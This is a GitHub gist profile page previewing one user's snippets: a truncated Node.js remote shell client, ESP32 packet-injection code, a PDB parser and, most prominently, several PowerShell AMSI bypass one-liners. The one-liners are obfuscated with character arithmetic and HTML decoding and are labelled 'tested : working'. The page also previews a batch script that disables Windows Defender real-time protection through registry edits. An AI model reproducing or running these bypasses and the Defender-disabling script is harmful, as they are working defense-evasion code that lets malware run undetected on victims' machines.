Skip to content

Instantly share code, notes, and snippets.

View GetRektBoy724's full-sized avatar
💀
goofy ahh

Hannn GetRektBoy724

💀
goofy ahh
  • Indonesia
View GitHub Profile
@GetRektBoy724
GetRektBoy724 / Client.js
Created June 3, 2019 18:54 — forked from roccomuso/Client.js
Node.js remote shell example
var net = require('net')
var readline = require('readline')
/**
* @class Client
* @param host {String} the host
* @param post {Integer} the port
*/
function Client (host, port) {
this.host = host
@GetRektBoy724
GetRektBoy724 / esp32_promisc.c
Created August 31, 2020 13:18 — forked from brainstorm/esp32_promisc.c
esp32 promiscuous mode and packet injection experiments
// Espressif ESP32 promiscuous mode and packet injection experiments
// by brainstorm at nopcode org
#include "freertos/FreeRTOS.h"
#include "esp_wifi.h"
#include "esp_wifi_internal.h"
#include "lwip/err.h"
#include "esp_system.h"
#include "esp_event.h"
#include "esp_event_loop.h"
Invoke-Expression 'AMSI Test Sample: 7e72c3ce-861b-4339-8740-0ac1484c1386'
@GetRektBoy724
GetRektBoy724 / amsibypass.ps1
Last active August 19, 2021 15:33
Matt Graeber's AMSI Bypass - Modified By Me - Old School But Its Working,Why Not?
[Ref].Assembly.GetType('S'+'y'+'s'+'t'+'e'+'m'+'.'+'M'+'a'+'n'+'a'+'g'+'e'+'m'+'e'+'n'+'t'+'.'+'A'+'u'+'t'+'o'+'m'+'a'+'t'+'i'+'o'+'n'+'.'+'A'+'m'+'s'+'i'+'U'+'t'+'i'+'l'+'s').GetField('a'+'m'+'s'+'i'+'I'+'n'+'i'+'t'+'F'+'a'+'i'+'l'+'e'+'d','N'+'o'+'n'+'P'+'u'+'b'+'l'+'i'+'c,'+'S'+'t'+'a'+'t'+'i'+'c').SetValue($null,$true)
@GetRektBoy724
GetRektBoy724 / amsibypass2.ps1
Last active August 19, 2021 15:33
Matt Graeber's Reflection Bypass - Modified by https://amsi.fail 1 - tested : working
[Ref].Assembly.GetType($([CHAR]([BYtE]0x53)+[ChAR]([bYtE]0x79)+[cHAr]([byTe]0x73)+[CHar](116)+[CHaR]([BYTE]0x65)+[cHaR](104+5)+[CHAr]([ByTe]0x2E)+[CHAr](50+27)+[cHAr](186-89)+[CHaR](9900/90)+[CHaR](60+37)+[CHaR]([Byte]0x67)+[chAr]([BytE]0x65)+[CHar]([bYtE]0x6D)+[CHAr]([BYTE]0x65)+[CHaR]([bYtE]0x6E)+[ChAr](188-72)+[Char](1610/35)+[chAR](455/7)+[chaR]([bYTE]0x75)+[CHAR](136-20)+[CHAR]([BYTe]0x6F)+[chaR]([byTE]0x6D)+[char](97)+[chaR]([Byte]0x74)+[chaR](4410/42)+[chAr](72+39)+[Char](7920/72)+[cHAR]([bytE]0x2E)+[chaR](65)+[cHAR]([Byte]0x6D)+[Char]([bytE]0x73)+[chaR](5670/54)+[ChAR]([bYte]0x55)+[CHAR](150-34)+[Char]([ByTe]0x69)+[char](108)+[chAr](115))).GetField(''+$([SYSTEM.NEt.webUTiliTY]::hTmLDEcoDE('amsi'))+'InitFailed','NonPublic,Static').SetValue($null,$true);
@GetRektBoy724
GetRektBoy724 / amsibypass3.ps1
Created January 8, 2021 11:50
Matt Graebers Reflection method with WMF5 autologging bypass - Modified by https://amsi.fail - tested : working
[Delegate]::CreateDelegate(("Func``3[String, $(([String].Assembly.GetType('System.Reflection.BindingFlags')).FullName), System.Reflection.FieldInfo]" -as [String].Assembly.GetType('System.Type')), [Object]([Ref].Assembly.GetType('System.Management.Automation.'+$([cHar]([bytE]0x41)+[cHAr](44+65)+[ChAR]([BYtE]0x73)+[ChAr](126-21))+'Utils')),($([sYStem.Net.wEBUtilITy]::hTmLdecODe('GetField')))).Invoke(''+$([cHAR]([bYtE]0x61)+[chAR]([bYte]0x6D)+[ChaR](2990/26)+[cHaR](5985/57))+'InitFailed',(('NonPublic,Static') -as [String].Assembly.GetType('System.Reflection.BindingFlags'))).SetValue($null,$True);
@GetRektBoy724
GetRektBoy724 / amsibypass4.ps1
Last active August 19, 2021 15:33
Matt Graeber's Reflection Bypass Method - Modified by https://amsi.fail 2 - Old school but its working,why not? - tested : working
[Ref].Assembly.GetType($([sYSTEM.Net.WebuTILITy]::HTmldECODE('System.Management.Automation.AmsiUtils'))).GetField(''+$([sYstEm.net.webutilIty]::hTMldECOde('amsi'))+'InitFailed','NonPublic,Static').SetValue($null,$true);
@GetRektBoy724
GetRektBoy724 / amsibypass5.ps1
Last active January 1, 2023 12:46
Matt Graeber's Reflection Bypass Method - Modified by https://amsi.fail 3 - Old school but its working,why not? - tested : working - shortest amsi bypass i have
[Ref].Assembly.GetType('System.Management.Automation.'+$([cHAr]([ByTE]0x41)+[cHAr]([byte]0x6D)+[ChAR](115)+[char]([bYtE]0x69))+'Utils').GetField($([systeM.NET.WEbUtIliTY]::HtMldECoDe('amsiInitFailed')),'NonPublic,Static').SetValue($null,$true);
@GetRektBoy724
GetRektBoy724 / disable_windows_defender.bat
Created January 27, 2021 09:18 — forked from pe3zx/disable_windows_defender.bat
Disable Windows Defender on Windows 10 1903
rem USE AT OWN RISK AS IS WITHOUT WARRANTY OF ANY KIND !!!!!
rem https://technet.microsoft.com/en-us/itpro/powershell/windows/defender/set-mppreference
rem To also disable Windows Defender Security Center include this
rem reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
rem 1 - Disable Real-time protection
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
@GetRektBoy724
GetRektBoy724 / pdb_parser_lite.cpp
Created December 18, 2022 12:50 — forked from namazso/pdb_parser_lite.cpp
A lightweight PDB parser that retrieves type and symbol CodeView streams.
/* MIT License
*
* Copyright (c) namazso 2018
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions: